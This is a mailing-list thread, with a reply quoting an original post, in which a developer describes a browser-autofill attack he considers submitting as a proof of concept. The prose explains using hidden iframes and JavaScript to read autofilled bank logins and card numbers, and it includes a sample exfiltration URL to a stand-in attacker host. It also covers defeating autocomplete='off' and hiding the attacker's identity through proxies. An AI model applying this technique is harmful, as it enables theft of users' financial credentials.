Re: [Flashcoders] field value theft from flash banners and xss exploited forms, or outright malicious websites

[Anthony Pace]

< input type="text" name="email" autocomplete="off" >

just realized that you would have to replace the text field in the 
submission form if it has autocomplete="off", and by redrawing the form 
getting autocomplete to work its magic and have your JS go through the 
testing process.



Anthony Pace wrote:
I was wondering if anyone here knew that this was possible and that 
it, according to some sources that this is one of the reasons it 
wasn't implemented in chrome:


I thought of this over two years ago; yet, never did anything with it 
(lazy... really lazy... plus I am not criminal).


Flash banners that inject javascript, xss exploited forms, or outright 
malicious websites,  can place hidden iframes that load a bunch of 
bank login sites, and using javascript take advantage of auto complete 
form fill functions that require no user interaction, by reading the 
value of the input fields.  Once you have the user's card# or login 
and pass, you can dynamically create and load a script tag with the 
src set to 
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah 
and you have sent the data to a remote location.  If interaction is 
required for the auto complete function to work, get javascript to 
cycle through the ascii and cycle focus back and forth from the field 
till their is a value change.


The user would of course signed up for a hotmail account, through a 
proxy, and used that hotmail account to setup a geocities account.  I 
know this wouldn't get everyone; yet, if you put it on a linkshare 
site, I am betting a hacker could just watch the collected info pour in.


I got it to work on my laptop for a locally hosted site, (on I won't 
tell with what browser and what parameters) and I am thinking about 
submitting a proof of concept; yet, I am wondering if anyone else 
wrote about this first, if I just missed it, and if there is someone 
else's proof of concept it would look like I was ripping off?

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders


___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders

[Flashcoders] field value theft from flash banners and xss exploited forms, or outright malicious websites

[Anthony Pace]

I was wondering if anyone here knew that this was possible and that it, 
according to some sources that this is one of the reasons it wasn't 
implemented in chrome:


I thought of this over two years ago; yet, never did anything with it 
(lazy... really lazy... plus I am not criminal).


Flash banners that inject javascript, xss exploited forms, or outright 
malicious websites,  can place hidden iframes that load a bunch of bank 
login sites, and using javascript take advantage of auto complete form 
fill functions that require no user interaction, by reading the value of 
the input fields.  Once you have the user's card# or login and pass, you 
can dynamically create and load a script tag with the src set to 
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah 
and you have sent the data to a remote location.  If interaction is 
required for the auto complete function to work, get javascript to cycle 
through the ascii and cycle focus back and forth from the field till 
their is a value change.


The user would of course signed up for a hotmail account, through a 
proxy, and used that hotmail account to setup a geocities account.  I 
know this wouldn't get everyone; yet, if you put it on a linkshare site, 
I am betting a hacker could just watch the collected info pour in.


I got it to work on my laptop for a locally hosted site, (on I won't 
tell with what browser and what parameters) and I am thinking about 
submitting a proof of concept; yet, I am wondering if anyone else wrote 
about this first, if I just missed it, and if there is someone else's 
proof of concept it would look like I was ripping off?

___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders